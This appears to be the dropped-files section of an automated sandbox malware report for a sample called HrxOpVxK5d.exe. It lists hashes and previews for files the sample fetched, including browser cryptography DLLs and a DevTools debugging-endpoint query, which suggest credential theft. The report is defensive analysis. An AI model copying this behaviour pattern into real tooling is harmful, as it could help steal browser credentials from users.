C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.007810727794161
Encrypted:	false
SSDEEP:	96:FYvFbDyEkSWHsVNB5vgQ2sbo239IM2g8VuC:FqFbDyV0dvgQ2l2NIa8uC
MD5:	9D788A035AE5CDE6B7C7ACBBDBC6972D
SHA1:	8983EEE630A0886EDF3AC62869193D5E4C7CB340
SHA-256:	243B741CBED719E74BE8C53CD5EA2C9580EDCD0EEF3DAB77A962BFAE9261B58A
SHA-512:	2FBC6E1704B1EB312A95BEAF59334B5704CCE5A94F07607B20C2B3B84B0EF31851B75A156949E846C54975DD937DD48896EB333D3B66E23C3EF731CD17E5D220
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.m.4.m.n.E.k.y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.3./.G.1.v.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.892876181693682
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xMxl9Il8ukXqAneS+m1ZYKF8puJII7f5uexjd/vc:a2Y+amEm1ZTF8AJII7f5PE
MD5:	08F7D497E0D7C79BAF4705A50FAF10AD
SHA1:	7D8FD0B4D9A1F8EC2A079A074EBEB2D3556A0B98
SHA-256:	ADA57ACD28A2DC1F1C560C3347C5EB3779B700B6F8CD9A3E96D76B18C29FA185
SHA-512:	06748A22D06E7E9E44244A00A4C5B241B684B702E72BB4D3B7C94CBEF25AD5454C01451F555E36BBBA4D80411E687BCA84E6F2F501CCE8447788FFE01C987FC4
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".5.6.5.A.z.B.p.R.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.3./.G.1.v.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.388363280290439
Encrypted:	false
SSDEEP:	96:6NnQCHQfNnQefPbQeKNnQU9QkNnQj2kdgEQjgNnQ8Q3NnQUDQDNnQAgygGwQAgVJ:6NoNNfRKN1NK2kcgNYNhgNH1NH
MD5:	AF1248ECABBFEAB182C68C89AF503F96
SHA1:	33D11F10C83FBD573BE3931DBFBCC9438354589C
SHA-256:	A8F3C74BDDCD63FCAA7E8FC3ADA6E9EA6618719C4670A8A79A2E935405FC7A0E
SHA-512:	F81660893C069C6DEF4FFACA7860578AB679B048BE5199A705205AF6BD272BF81FB63A506E0CCBD9F79EF6A93C7DF60039065B268C0459344CEC5486066F0731
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/C72A181BB9B4C87681EA262EF791F193",.. "id": "C72A181BB9B4C87681EA262EF791F193",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C72A181BB9B4C87681EA262EF791F193"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/9B9CF0D42F4F72E0E246865F17C3485D",.. "id": "9B9CF0D42F4F72E0E246865F17C3485D",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/9B9CF0D42F4F72E0E246865F17C3485D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.380292257639993
Encrypted:	false
SSDEEP:	48:SfNaoQpZQZSTEQpZxYfNaoQXiBiGQXi5fNaoQYrIQYYfNaoQUy0UrU0U8QS:6NnQpZQZSTEQpZiNnQXiBiGQXiVNnQpN
MD5:	96A6EA07FD0A17F34C26C11FBB908B35
SHA1:	C22B3AA2E981FF8D74EC8E26AFB700714BF876AA
SHA-256:	DF988E781900F82C3741F402EEC56C33EFDEA80C01CDB21FF87F1EAAA229A373
SHA-512:	85AD24EFA16BA68904F0BEFEC1C3980D50D1CBCFD3C8A71FB8293046B0CDD40182A9FD22A0386C199440259131A8944D9A7E823FBD91046660A1DEB9F63B5E5B
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/C24794F76E00F9548B4BADAD73D40EDC",.. "id": "C24794F76E00F9548B4BADAD73D40EDC",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C24794F76E00F9548B4BADAD73D40EDC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/18655B7216335A3E683EA528D99D770F",.. "id": "18655B7216335A3E683EA528D99D770F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/18655B7216335A3E683EA528D99D770F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\194eef6e-f594-43bf-8de4-79da6a1e264f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\237d5c88-a041-42b9-b05e-5f060bf57689.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\26997a80-8ada-4a8e-9bee-529c52ce3c7b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
Category:	dropped
Size (bytes):	76326
Entropy (8bit):	7.9961120748813075
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
MD5:	01E352D35675990A139199DD86B38AAC
SHA1:	E16163C81E5F36B3B819AA0A63BFA63D88548A91
SHA-256:	148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
SHA-512:	75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\3d1f5e7b-85ca-4db9-9bd6-852577826423.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\4a0b6696-98b4-4ddb-8300-a05533ab40c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.383812222859029
Encrypted:	false
SSDEEP:	24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0m75Vc0mcL5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5g
MD5:	8F2DFDA47A54A2D946FC772C2651A374
SHA1:	9FDF28E88F977D5C40935E3C52F2D5D4DDDF46A7
SHA-256:	03C61BE19311065F8BAAA49D4BFCD323015CDC547D9473D596758B0BAAC00695
SHA-512:	ED3EA88376BB013C6DA94E9EDABCB43A463D9640002DD093320BD2150366E9FA928A334CD0AF8134F4ADA37710990DEE608460305E15652F009498CD202D8A76
Malicious:	false
Preview:	{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

C:\Users\user\AppData\Local\Temp\d05192dc-3430-4bca-a6d3-78ced5cf7f2d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\d48252db-e4bc-4ab0-9f63-cf692cb7ce1e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
Category:	dropped
Size (bytes):	1849932
Entropy (8bit):	7.9947331000028665
